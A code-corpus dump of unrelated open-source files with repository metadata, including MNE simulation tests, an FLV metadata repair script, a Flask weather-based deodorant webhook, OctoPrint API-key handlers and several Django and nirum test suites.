stc, trans, src, sphere, cov=None,
ecg=True, blink=True, random_state=seed)
raw_sim_eeg = simulate_raw(raw.copy().pick_types(meg=False, eeg=True),
stc, trans, src, sphere, cov=None,
ecg=True, blink=True, random_state=seed)
raw_sim_meeg = simulate_raw(raw.copy().pick_types(meg=True, eeg=True),
stc, trans, src, sphere, cov=None,
ecg=True, blink=True, random_state=seed)
assert_allclose(np.concatenate((raw_sim_meg[:][0], raw_sim_eeg[:][0])),
raw_sim_meeg[:][0], rtol=1e-7, atol=1e-20)
del raw_sim_meg, raw_sim_eeg, raw_sim_meeg
# check that different interpolations are similar given small movements
raw_sim = simulate_raw(raw, stc, trans, src, sphere, cov=None,
head_pos=head_pos_sim, interp='linear')
raw_sim_hann = simulate_raw(raw, stc, trans, src, sphere, cov=None,
head_pos=head_pos_sim, interp='hann')
assert_allclose(raw_sim[:][0], raw_sim_hann[:][0], rtol=1e-1, atol=1e-14)
del raw_sim, raw_sim_hann
# Make impossible transform (translate up into helmet) and ensure failure
head_pos_sim_err = deepcopy(head_pos_sim)
head_pos_sim_err[1.][2, 3] -= 0.1 # z trans upward 10cm
assert_raises(RuntimeError, simulate_raw, raw, stc, trans, src, sphere,
ecg=False, blink=False, head_pos=head_pos_sim_err)
assert_raises(RuntimeError, simulate_raw, raw, stc, trans, src,
bem_fname, ecg=False, blink=False,
head_pos=head_pos_sim_err)
# other degenerate conditions
assert_raises(TypeError, simulate_raw, 'foo', stc, trans, src, sphere)
assert_raises(TypeError, simulate_raw, raw, 'foo', trans, src, sphere)
assert_raises(ValueError, simulate_raw, raw, stc.copy().crop(0, 0),
trans, src, sphere)
stc_bad = stc.copy()
stc_bad.tstep += 0.1
assert_raises(ValueError, simulate_raw, raw, stc_bad, trans, src, sphere)
assert_raises(RuntimeError, simulate_raw, raw, stc, trans, src, sphere,
chpi=True) # no cHPI info
assert_raises(ValueError, simulate_raw, raw, stc, trans, src, sphere,
interp='foo')
assert_raises(TypeError, simulate_raw, raw, stc, trans, src, sphere,
head_pos=1.)
assert_raises(RuntimeError, simulate_raw, raw, stc, trans, src, sphere,
head_pos=pos_fname) # ends up with t>t_end
head_pos_sim_err = deepcopy(head_pos_sim)
head_pos_sim_err[-1.] = head_pos_sim_err[1.] # negative time
assert_raises(RuntimeError, simulate_raw, raw, stc, trans, src, sphere,
head_pos=head_pos_sim_err)
raw_bad = raw.copy()
raw_bad.info['dig'] = None
assert_raises(RuntimeError, simulate_raw, raw_bad, stc, trans, src, sphere,
blink=True)
@slow_test
@testing.requires_testing_data
def test_simulate_raw_bem():
"""Test simulation of raw data with BEM."""
raw, src, stc, trans, sphere = _get_data()
src = setup_source_space('sample', 'oct1', subjects_dir=subjects_dir)
for s in src:
s['nuse'] = 3
s['vertno'] = src[1]['vertno'][:3]
s['inuse'].fill(0)
s['inuse'][s['vertno']] = 1
# use different / more complete STC here
vertices = [s['vertno'] for s in src]
stc = SourceEstimate(np.eye(sum(len(v) for v in vertices)), vertices,
0, 1. / raw.info['sfreq'])
raw_sim_sph = simulate_raw(raw, stc, trans, src, sphere, cov=None)
raw_sim_bem = simulate_raw(raw, stc, trans, src, bem_fname, cov=None,
n_jobs=2)
# some components (especially radial) might not match that well,
# so just make sure that most components have high correlation
assert_array_equal(raw_sim_sph.ch_names, raw_sim_bem.ch_names)
picks = pick_types(raw.info, meg=True, eeg=True)
n_ch = len(picks)
corr = np.corrcoef(raw_sim_sph[picks][0], raw_sim_bem[picks][0])
assert_array_equal(corr.shape, (2 * n_ch, 2 * n_ch))
med_corr = np.median(np.diag(corr[:n_ch, -n_ch:]))
assert_true(med_corr > 0.65, msg=med_corr)
# do some round-trip localization
for s in src:
transform_surface_to(s, 'head', trans)
locs = np.concatenate([s['rr'][s['vertno']] for s in src])
tmax = (len(locs) - 1) / raw.info['sfreq']
cov = make_ad_hoc_cov(raw.info)
# The tolerance for the BEM is surprisingly high (28) but I get the same
# result when using MNE-C and Xfit, even when using a proper 5120 BEM :(
for use_raw, bem, tol in ((raw_sim_sph, sphere, 1),
(raw_sim_bem, bem_fname, 31)):
events = find_events(use_raw, 'STI 014')
assert_equal(len(locs), 6)
evoked = Epochs(use_raw, events, 1, 0, tmax, baseline=None).average()
assert_equal(len(evoked.times), len(locs))
fits = fit_dipole(evoked, cov, bem, trans, min_dist=1.)[0].pos
diffs = np.sqrt(np.sum((locs - fits) ** 2, axis=-1)) * 1000
med_diff = np.median(diffs)
assert_true(med_diff < tol, msg='%s: %s' % (bem, med_diff))
@slow_test
@testing.requires_testing_data
def test_simulate_raw_chpi():
"""Test simulation of raw data with cHPI."""
raw = read_raw_fif(raw_chpi_fname, allow_maxshield='yes')
picks = np.arange(len(raw.ch_names))
picks = np.setdiff1d(picks, pick_types(raw.info, meg=True, eeg=True)[::4])
raw.load_data().pick_channels([raw.ch_names[pick] for pick in picks])
raw.info.normalize_proj()
sphere = make_sphere_model('auto', 'auto', raw.info)
# make sparse spherical source space
sphere_vol = tuple(sphere['r0'] * 1000.) + (sphere.radius * 1000.,)
src = setup_volume_source_space('sample', sphere=sphere_vol, pos=70.)
stc = _make_stc(raw, src)
# simulate data with cHPI on
raw_sim = simulate_raw(raw, stc, None, src, sphere, cov=None, chpi=False,
interp='zero')
# need to trim extra samples off this one
raw_chpi = simulate_raw(raw, stc, None, src, sphere, cov=None, chpi=True,
head_pos=pos_fname, interp='zero')
# test cHPI indication
hpi_freqs, hpi_pick, hpi_ons = _get_hpi_info(raw.info)
assert_allclose(raw_sim[hpi_pick][0], 0.)
assert_allclose(raw_chpi[hpi_pick][0], hpi_ons.sum())
# test that the cHPI signals make some reasonable values
picks_meg = pick_types(raw.info, meg=True, eeg=False)
picks_eeg = pick_types(raw.info, meg=False, eeg=True)
for picks in [picks_meg[:3], picks_eeg[:3]]:
psd_sim, freqs_sim = psd_welch(raw_sim, picks=picks)
psd_chpi, freqs_chpi = psd_welch(raw_chpi, picks=picks)
assert_array_equal(freqs_sim, freqs_chpi)
freq_idx = np.sort([np.argmin(np.abs(freqs_sim - f))
for f in hpi_freqs])
if picks is picks_meg:
assert_true((psd_chpi[:, freq_idx] >
100 * psd_sim[:, freq_idx]).all())
else:
assert_allclose(psd_sim, psd_chpi, atol=1e-20)
# test localization based on cHPI information
quats_sim = _calculate_chpi_positions(raw_chpi, t_step_min=10.)
quats = read_head_pos(pos_fname)
_assert_quats(quats, quats_sim, dist_tol=5e-3, angle_tol=3.5)
run_tests_if_main()
| bsd-3-clause | -239,478,660,592,898,980 | 45.211268 | 79 | 0.604846 | false |
CMUSV-VisTrails/WorkflowRecommendation | vistrails/core/cache/utils.py | 1 | 2304 | ###############################################################################
##
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: [email protected]
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
"""Helper functions for cache package."""
try:
import hashlib
sha_hash = hashlib.sha1
except ImportError:
import sha
sha_hash = sha.new
##############################################################################
def hash_list(lst, hasher_f, constant_hasher_map={}):
hasher = sha_hash()
hash_l = [hasher_f(el, constant_hasher_map) for el in lst]
hash_l.sort()
for hel in hash_l: hasher.update(hel)
return hasher.digest()
| bsd-3-clause | 1,477,760,557,045,283,600 | 45.08 | 79 | 0.659722 | false |
a67878813/script | flvrepair.py | 1 | 3480 | # coding: utf-8
#2019.11.24 refixed in ubuntu19.10
#使用前需安装yamdi
#sudo apt install yamdi
#ubuntu 16.04LTS
#与win机器mount命令示例:
#sudo mount -t cifs -o username="用户名",password="密码",uid=1000 //192.168.2.90/raid5_5-9/直播录像 /mnt2
#若目录不存在,terminal中
#sudo mkdir mnt2
#sudo chown -R linux用户名:linux用户名 mnt2
#使用方法 :
#1.修改脚本预计遍历flv的目录(contents变量)后
#2.终端(terminal)中 cd 进入相应目录。
#python3 flvrepair2.py
import os
import os.path
import json
import random
import pickle
import time
from termcolor import colored
#子进程相关模块
import subprocess
#contents为预计遍历flv目录
contents = "/mnt"
#******************************
error_counts = 0
s =[]
for root, dirs, files in os.walk(contents):
for name in files:
s.append(os.path.join(root, name))
#可注释掉
#print(s)
end_list = []
try:
with open(contents+'/done_list.json', 'r') as r:
done_list = json.load(r)
except FileNotFoundError:
print("donelist is not exist")
done_list = []
with open(contents+'/done_list.json', 'w') as f:
f.write(json.dumps(done_list))
for line in s:
#未修复的flv文件,追加到end_list中
if (".flv" in line) and (line not in done_list):
end_list.append(line)
print_list=end_list[:3]
for i in print_list:
print(i)
print(colored((" 未添加meta数据的flv文件数 = " + str(len(end_list))),"cyan"))
#判断临时目录是否存在
if os.path.isdir(contents+"/_temp"):
pass
else:
os.mkdir(contents+"/_temp")
print("临时目录已建立")
#
#os.remove(contents+"/_temp")
for line in end_list:
#
try:
ctime = os.path.getctime(line)
except :
error_counts +=1
continue
#
salt_ = random.randint(110, 880)
print(colored("进行meta注入 = "+str(line),"green"))
try:
child = subprocess.Popen(["/usr/bin/yamdi","-i",line,"-o",contents+"/_temp/output.tmp"],stderr=subprocess.STDOUT)
child.wait()
except:
error_counts +=1
print(colored("meta信息写入错误","red"))
print(colored(line,"red"))
print(child.stderr)
continue
time.sleep(10)
try:
child2 = subprocess.Popen(["mv","-f",contents+"/_temp/output.tmp",line],stderr=subprocess.STDOUT)
child2.wait() #等待子进程结束,父进程继续
except :
error_counts +=1
print(colored("mv错误","red"))
print(colored(line,"red"))
continue
time.sleep(10)
#
try:
os.utime(line, (ctime,ctime))
except :
error_counts +=1
continue
print(colored("meta注入完成 = "+str(line),"green"))
print(colored("next","green"))
#更新 完成列表
try:
with open(contents+'/done_list.json', 'r') as r:
done_list = json.load(r)
except:
continue
done_list.append(line)
with open(contents+'/done_list.json', 'w') as f:
f.write(json.dumps(done_list))
try:
with open(contents+'/done_list.pik', 'wb') as f:
pickle.dump(done_list,f)
except:
continue
print(colored(("Error_Counts =" + str(error_counts)),"red"))
if error_counts == 0 :
print(colored("全部完成","green"))
else:
print(colored("全部完成 with error = "+str(error_counts),"red"))
| apache-2.0 | -2,722,938,224,545,431,000 | 20.682759 | 121 | 0.594148 | false |
jzawar/highstreet | app.py | 1 | 5268 | #!/usr/bin/env python
from __future__ import print_function
from future.standard_library import install_aliases
install_aliases()
from urllib.parse import urlparse, urlencode
from urllib.request import urlopen, Request
from urllib.error import HTTPError
import json
import os
import re
from flask import Flask
from flask import request
from flask import make_response
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print("Request:")
print(json.dumps(req, indent=4))
res = processRequest(req)
res = json.dumps(res, indent=4)
# print(res)
r = make_response(res)
r.headers['Content-Type'] = 'application/json'
return r
def suggestDeodrant(condition, person, city):
print(person)
url = 'http://ipinfo.io/json'
res = urlopen(url)
dt = json.load(res)
IP=dt['ip']
org=dt['org']
currCity =dt['city']
country =dt['country']
region=dt['region']
humidWeatherList = ['Cloudy','mostly cloudy (night)','mostly cloudy (day)','partly cloudy (night)','partlycloudy (day)','tornado','tropical storm','hurricane','severe thunderstorms','thunderstorms','mixed rain and snow','mixed rain and sleet','mixed snow and sleet','freezing drizzle','drizzle','freezing rain','Showers','snow flurries','light snow showers','blowing snow','snow','hail','sleet','mixed rain and hail','thundershowers','snow showers','isolated','thundershowers'];
hotWeatherList = ['dust','foggy','haze','smoky','blustery','windy','cold','clear (night)','sunny','fair (night)','fair (day)','hot','isolated thunderstorms','scattered thunderstorms','scattered thunderstorms','scattered showers','heavy snow','scattered snow showers','heavy snow','partly cloudy'];
if(condition in humidWeatherList):
if person == 'Men':
condition = 'Hmmm.. The weather in '+city+' looks '+condition+'. I suggest these <a href="/highstreetstorefront/highstreet/en/highstreet-Catalogue/Perfumes/Men-Perfumes/Moist/c/580">Anti-Perspirant Deodrants</a> for ' + person
else:
condition = 'Hmmm.. The weather in '+city+' looks '+condition+'. I suggest these <a href="/highstreetstorefront/highstreet/en/highstreet-Catalogue/Perfumes/Women-Perfumes/Moist/c/395">Anti-Perspirant Deodrants</a> for ' + person
else:
if person == 'Men':
condition = 'Hmmm.. The weather in '+city+' looks '+condition+'. I suggest these <a href="/highstreetstorefront/highstreet/en/highstreet-Catalogue/Perfumes/Men-Perfumes/Dry/c/570">Perfumed Deodrants</a> for ' + person
else:
condition = 'Hmmm.. The weather in '+city+' looks '+condition+'. I suggest these <a href="/highstreetstorefront/highstreet/en/highstreet-Catalogue/Perfumes/Women-Perfumes/Dry/c/390">Perfumed Deodrants</a> for ' + person
if currCity != city:
condition = condition+' I see you are currently in '+currCity+'. Are you making an air travel to '+city+'?'
return condition
def processRequest(req):
if req.get("result").get("action") != "yahooWeatherForecast":
return {}
baseurl = "https://query.yahooapis.com/v1/public/yql?"
yql_query = makeYqlQuery(req)
if yql_query is None:
return {}
yql_url = baseurl + urlencode({'q': yql_query}) + "&format=json"
result = urlopen(yql_url).read()
data = json.loads(result)
res = makeWebhookResult(data,req)
return res
def makeYqlQuery(req):
result = req.get("result")
parameters = result.get("parameters")
city = parameters.get("geo-city")
if city is None:
return None
return "select * from weather.forecast where woeid in (select woeid from geo.places(1) where text='" + city + "')"
def makeWebhookResult(data, req):
query = data.get('query')
if query is None:
return {}
result = query.get('results')
if result is None:
return {}
channel = result.get('channel')
if channel is None:
return {}
item = channel.get('item')
location = channel.get('location')
units = channel.get('units')
if (location is None) or (item is None) or (units is None):
return {}
condition = item.get('condition')
if condition is None:
return {}
# print(json.dumps(item, indent=4))
#speech = "Today in " + location.get('city') + ": " + condition.get('text') + \
# ", the temperature is " + condition.get('temp') + " " + units.get('temperature')
speech = "Hmmm.. It looks " + condition.get('text') + " in " + location.get('city')
airesult = req.get("result")
parameters = airesult.get("parameters")
person = parameters.get('Person')
city = parameters.get("geo-city")
returnedSpeech = suggestDeodrant(condition.get('text'), person, city)
print(returnedSpeech)
#print("Response:")
#print(speech)
return {
"speech": returnedSpeech,
"displayText": returnedSpeech,
# "data": data,
# "contextOut": [],
"source": "apiai-weather-webhook-sample"
}
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print("Starting app on port %d" % port)
app.run(debug=False, port=port, host='0.0.0.0')
| apache-2.0 | 1,609,381,478,073,361,700 | 35.583333 | 482 | 0.656986 | false |
rcosnita/fantastico | fantastico/routing_engine/__init__.py | 1 | 1176 | '''
Copyright 2013 Cosnita Radu Viorel
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
.. codeauthor:: Radu Viorel Cosnita <[email protected]>
.. py:module:: fantastico.routing_engine
''' | mit | 8,748,253,644,158,708,000 | 60.947368 | 126 | 0.793367 | false |
pudo/aleph | aleph/tests/test_groups_api.py | 1 | 1170 | from aleph.core import db
from aleph.model import Role
from aleph.views.util import validate
from aleph.tests.util import TestCase
class GroupsApiTestCase(TestCase):
def setUp(self):
super(GroupsApiTestCase, self).setUp()
self.role = self.create_user(foreign_id='user_1')
group = Role.load_or_create('group_1', Role.GROUP, 'group 1')
self.role.add_role(group)
group = Role.load_or_create('group_2', Role.GROUP, 'group 2')
self.role.add_role(group)
self.other = self.create_user(foreign_id='other')
db.session.commit()
def test_index(self):
res = self.client.get('/api/2/groups')
assert res.status_code == 403, res
_, headers = self.login(foreign_id='user_1')
res = self.client.get('/api/2/groups', headers=headers)
assert res.status_code == 200, res
assert res.json['total'] == 2, res.json
validate(res.json['results'][0], 'Role')
_, headers = self.login(foreign_id='other')
res = self.client.get('/api/2/groups', headers=headers)
assert res.status_code == 200, res
assert res.json['total'] == 0, res.json
| mit | 7,372,743,651,423,293,000 | 38 | 69 | 0.623932 | false |
spoqa/nirum-python | tests/datastructures_test.py | 1 | 4258 | import collections
import pickle
from pytest import raises
from nirum.datastructures import List, Map
def test_map_init():
assert list(Map()) == []
assert (sorted(Map([('a', 1), ('b', 2)]).items()) ==
sorted(Map({'a': 1, 'b': 2}).items()) ==
sorted(Map(Map({'a': 1, 'b': 2})).items()) ==
sorted(Map(a=1, b=2).items()) ==
sorted(Map([('a', 1)], b=2).items()) ==
sorted(Map({'a': 1}, b=2).items()) ==
sorted(Map(Map([('a', 1)]), b=2).items()) ==
[('a', 1), ('b', 2)])
assert isinstance(Map(), collections.Mapping)
assert not isinstance(Map(), collections.MutableMapping)
def test_map_equality(fx_record_type, fx_unboxed_type):
Point = fx_record_type
Offset = fx_unboxed_type
a = Map([
(Offset(1.), Point(left=Offset(1.), top=Offset(2.0))),
(Offset(3.), Point(left=Offset(3.), top=Offset(4.0))),
])
b = Map([
(Offset(1.), Point(left=Offset(1.), top=Offset(2.0))),
(Offset(3.), Point(left=Offset(3.), top=Offset(4.0))),
])
c = Map([
(Offset(1.), Point(left=Offset(1.), top=Offset(2.0))),
(Offset(3.), Point(left=Offset(3.), top=Offset(5.0))),
])
assert a == b
assert not (a != b)
assert hash(a) == hash(b)
assert b != c
assert not (b == c)
assert hash(b) != hash(c)
assert a != c
assert not (a == c)
def test_map_iter():
assert list(Map()) == []
assert list(Map(a=1)) == ['a']
assert list(Map(a=1, b=2)) in (['a', 'b'], ['b', 'a'])
def test_map_len():
assert len(Map()) == 0
assert len(Map(a=1)) == 1
assert len(Map(a=1, b=2)) == 2
def test_map_getitem():
m = Map(a=1, b=2)
assert m['a'] == m.get('a') == m.get('a', 0) == 1
assert m['b'] == m.get('b') == m.get('b', 0) == 2
with raises(KeyError):
m['c']
assert m.get('c') is None
assert m.get('c', 0) == 0
def test_map_contains():
m = Map(a=1, b=2)
assert 'a' in m
assert 'b' in m
assert 'c' not in m
def test_map_pickle():
def p(v):
assert pickle.loads(pickle.dumps(v)) == v
p(Map())
p(Map(a=1))
p(Map(a=1, b=2))
p(Map(d=Map(a=1, b=2)))
def test_map_bool():
assert not Map()
assert Map(a=1)
assert Map(a=1, b=2)
def test_map_repr():
assert repr(Map()) == 'nirum.datastructures.Map()'
assert repr(Map(a=1)) == "nirum.datastructures.Map({'a': 1})"
assert repr(Map(a=1, b=2)) == "nirum.datastructures.Map({'a': 1, 'b': 2})"
def test_list():
immutable_list = List([1, 2])
with raises(AttributeError):
immutable_list.append(1)
with raises(TypeError):
immutable_list + [3]
assert isinstance(immutable_list, collections.Sequence)
assert not isinstance(immutable_list, collections.MutableSequence)
assert immutable_list[0] == 1
assert len(immutable_list) == 2
assert 2 in immutable_list
assert next(iter(immutable_list)) == 1
assert immutable_list.index(2) == 1
assert immutable_list.count(1) == 1
assert immutable_list.count(2) == 1
assert immutable_list.count(3) == 0
def test_list_equality(fx_record_type, fx_unboxed_type):
Point = fx_record_type
Offset = fx_unboxed_type
a = List([
Point(left=Offset(1.), top=Offset(2.)),
Point(left=Offset(3.), top=Offset(4.)),
])
b = List([
Point(left=Offset(1.), top=Offset(2.)),
Point(left=Offset(3.), top=Offset(4.)),
])
c = List([
Point(left=Offset(1.), top=Offset(2.)),
Point(left=Offset(3.), top=Offset(5.)),
])
assert a == b
assert not (a != b)
assert hash(a) == hash(b)
assert b != c
assert not (b == c)
assert hash(b) != hash(c)
assert a != c
assert not (a == c)
def test_list_immutable():
mutable_list = [1, 2]
immutable_list = List(mutable_list)
mutable_list.append(3)
assert immutable_list.items != mutable_list
assert immutable_list.items == [1, 2]
assert mutable_list == [1, 2, 3]
def test_list_repr():
assert repr(List([])) == 'nirum.datastructures.List([])'
assert repr(List([1])) == 'nirum.datastructures.List([1])'
assert repr(List([1, 2])) == 'nirum.datastructures.List([1, 2])'
| mit | -3,196,325,386,247,096,000 | 26.470968 | 78 | 0.546501 | false |
Salandora/OctoPrint | src/octoprint/server/util/__init__.py | 1 | 6142 | # coding=utf-8
from __future__ import absolute_import, division, print_function
__author__ = "Gina Häußge <[email protected]>"
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
__copyright__ = "Copyright (C) 2014 The OctoPrint Project - Released under terms of the AGPLv3 License"
from octoprint.settings import settings
import octoprint.timelapse
import octoprint.server
from octoprint.users import ApiUser
from octoprint.util import deprecated
import flask as _flask
import flask_login
import flask_principal
from . import flask
from . import sockjs
from . import tornado
from . import watchdog
def enforceApiKeyRequestHandler():
"""
``before_request`` handler for blueprints which makes sure an API key is provided
"""
import octoprint.server
if _flask.request.method == 'OPTIONS':
# we ignore OPTIONS requests here
return
if _flask.request.endpoint and (_flask.request.endpoint == "static" or _flask.request.endpoint.endswith(".static")):
# no further handling for static resources
return
apikey = get_api_key(_flask.request)
if apikey is None:
return _flask.make_response("No API key provided", 401)
if apikey != octoprint.server.UI_API_KEY and not settings().getBoolean(["api", "enabled"]):
# api disabled => 401
return _flask.make_response("API disabled", 401)
apiKeyRequestHandler = deprecated("apiKeyRequestHandler has been renamed to enforceApiKeyRequestHandler")(enforceApiKeyRequestHandler)
def loginFromApiKeyRequestHandler():
"""
``before_request`` handler for blueprints which creates a login session for the provided api key (if available)
UI_API_KEY and app session keys are handled as anonymous keys here and ignored.
"""
apikey = get_api_key(_flask.request)
if apikey and apikey != octoprint.server.UI_API_KEY and not octoprint.server.appSessionManager.validate(apikey):
user = get_user_for_apikey(apikey)
if user is not None and not user.is_anonymous and flask_login.login_user(user, remember=False):
flask_principal.identity_changed.send(_flask.current_app._get_current_object(),
identity=flask_principal.Identity(user.get_id()))
else:
return _flask.make_response("Invalid API key", 401)
def corsRequestHandler():
"""
``before_request`` handler for blueprints which sets CORS headers for OPTIONS requests if enabled
"""
if _flask.request.method == 'OPTIONS' and settings().getBoolean(["api", "allowCrossOrigin"]):
# reply to OPTIONS request for CORS headers
return optionsAllowOrigin(_flask.request)
def corsResponseHandler(resp):
"""
``after_request`` handler for blueprints for which CORS is supported.
Sets ``Access-Control-Allow-Origin`` headers for ``Origin`` request header on response.
"""
# Allow crossdomain
allowCrossOrigin = settings().getBoolean(["api", "allowCrossOrigin"])
if _flask.request.method != 'OPTIONS' and 'Origin' in _flask.request.headers and allowCrossOrigin:
resp.headers['Access-Control-Allow-Origin'] = _flask.request.headers['Origin']
return resp
def noCachingResponseHandler(resp):
"""
``after_request`` handler for blueprints which shall set no caching headers
on their responses.
Sets ``Cache-Control``, ``Pragma`` and ``Expires`` headers accordingly
to prevent all client side caching from taking place.
"""
return flask.add_non_caching_response_headers(resp)
def noCachingExceptGetResponseHandler(resp):
"""
``after_request`` handler for blueprints which shall set no caching headers
on their responses to any requests that are not sent with method ``GET``.
See :func:`noCachingResponseHandler`.
"""
if _flask.request.method == "GET":
return flask.add_no_max_age_response_headers(resp)
else:
return flask.add_non_caching_response_headers(resp)
def optionsAllowOrigin(request):
"""
Shortcut for request handling for CORS OPTIONS requests to set CORS headers.
"""
resp = _flask.current_app.make_default_options_response()
# Allow the origin which made the XHR
resp.headers['Access-Control-Allow-Origin'] = request.headers['Origin']
# Allow the actual method
resp.headers['Access-Control-Allow-Methods'] = request.headers['Access-Control-Request-Method']
# Allow for 10 seconds
resp.headers['Access-Control-Max-Age'] = "10"
# 'preflight' request contains the non-standard headers the real request will have (like X-Api-Key)
customRequestHeaders = request.headers.get('Access-Control-Request-Headers', None)
if customRequestHeaders is not None:
# If present => allow them all
resp.headers['Access-Control-Allow-Headers'] = customRequestHeaders
return resp
def get_user_for_apikey(apikey):
if settings().getBoolean(["api", "enabled"]) and apikey is not None:
if apikey == settings().get(["api", "key"]) or octoprint.server.appSessionManager.validate(apikey):
# master key or an app session key was used
return ApiUser()
elif octoprint.server.userManager.enabled:
# user key might have been used
return octoprint.server.userManager.findUser(apikey=apikey)
return None
def get_api_key(request):
# Check Flask GET/POST arguments
if hasattr(request, "values") and "apikey" in request.values:
return request.values["apikey"]
# Check Tornado GET/POST arguments
if hasattr(request, "arguments") and "apikey" in request.arguments \
and len(request.arguments["apikey"]) > 0 and len(request.arguments["apikey"].strip()) > 0:
return request.arguments["apikey"]
# Check Tornado and Flask headers
if "X-Api-Key" in request.headers.keys():
return request.headers.get("X-Api-Key")
return None
def get_plugin_hash():
from octoprint.plugin import plugin_manager
plugin_signature = lambda impl: "{}:{}".format(impl._identifier, impl._plugin_version)
template_plugins = map(plugin_signature, plugin_manager().get_implementations(octoprint.plugin.TemplatePlugin))
asset_plugins = map(plugin_signature, plugin_manager().get_implementations(octoprint.plugin.AssetPlugin))
ui_plugins = sorted(set(template_plugins + asset_plugins))
import hashlib
plugin_hash = hashlib.sha1()
plugin_hash.update(",".join(ui_plugins))
return plugin_hash.hexdigest()
| agpl-3.0 | -1,420,406,611,270,146,000 | 32.736264 | 134 | 0.744788 | false |
UKTradeInvestment/export-wins-data | mi/tests/test_hvc_views.py | 1 | 42324 | import datetime
from django.test import TestCase
from django.utils.timezone import get_current_timezone
from factory.fuzzy import FuzzyChoice
from freezegun import freeze_time
from django.urls import reverse
from django.core.management import call_command
from fixturedb.factories.win import create_win_factory
from mi.factories import TargetFactory, SectorTeamFactory
from mi.models import FinancialYear, Country, HVCGroup, TargetCountry
from mi.tests.base_test_case import MiApiViewsBaseTestCase, MiApiViewsWithWinsBaseTestCase
from mi.tests.utils import GenericWinTableTestMixin
from wins.constants import SECTORS
from wins.factories import NotificationFactory, HVCFactory
from wins.models import Notification, _get_open_hvcs, normalize_year, HVC
@freeze_time(datetime.datetime(2017, 5, 30, tzinfo=get_current_timezone()))
class HVCBaseViewTestCase(MiApiViewsWithWinsBaseTestCase):
""" HVC Detail page base test case """
view_base_url = reverse('mi:hvc_campaign_detail', kwargs={"campaign_id": "E017"})
export_value = 100000
win_date_2017 = datetime.datetime(2017, 5, 25, tzinfo=get_current_timezone())
win_date_2016 = datetime.datetime(2016, 5, 25, tzinfo=get_current_timezone())
fy_2016_last_date = datetime.datetime(2017, 3, 31, tzinfo=get_current_timezone())
@classmethod
def setUpClass(cls):
super().setUpClass()
call_command('create_missing_hvcs', verbose=False)
def get_url_for_year(self, year, base_url=None):
if not base_url:
base_url = self.view_base_url
return '{base}?year={year}'.format(base=base_url, year=year)
class HVCDetailsTestCase(HVCBaseViewTestCase):
TEST_CAMPAIGN_ID = "E017"
TARGET_E017_17 = 30000000
PRORATED_TARGET_17 = 2465760 # target based on the frozen date
def setUp(self):
super().setUp()
self._win_factory_function = create_win_factory(
self.user, sector_choices=self.TEAM_1_SECTORS)
self.view_base_url = self.cen_campaign_url
cen_campaign_url = reverse('mi:hvc_campaign_detail', kwargs={"campaign_id": "E017"})
campaign_url_2016_only = reverse('mi:hvc_campaign_detail', kwargs={"campaign_id": "E177"})
campaign_url_2017_only = reverse('mi:hvc_campaign_detail', kwargs={"campaign_id": "E218"})
def test_2017_campaign_in_2016_404(self):
self.view_base_url = self.campaign_url_2017_only
self.url = self.get_url_for_year(2016)
self._get_api_response(self.url, status_code=404)
def test_2016_campaign_in_2017_404(self):
self.view_base_url = self.campaign_url_2016_only
self.url = self.get_url_for_year(2017)
self._get_api_response(self.url, status_code=404)
def test_details_json_2016_no_wins(self):
self.url = self.get_url_for_year(2016)
self.expected_response = {
"wins": {
"totals": {
"value": {
"grand_total": 0,
"unconfirmed": 0,
"confirmed": 0
},
"number": {
"grand_total": 0,
"unconfirmed": 0,
"confirmed": 0
}
},
"progress": {
"status": "red",
"unconfirmed_percent": 0,
"confirmed_percent": 0
}
},
"name": "HVC: E017",
"campaign_id": "E017",
"hvcs": {
"campaigns": [
"HVC: E017",
],
"target": self.CAMPAIGN_TARGET
},
"avg_time_to_confirm": 0.0
}
self.assertResponse()
def test_details_no_wins_2016(self):
self.url = self.get_url_for_year(2016)
api_response = self._api_response_data
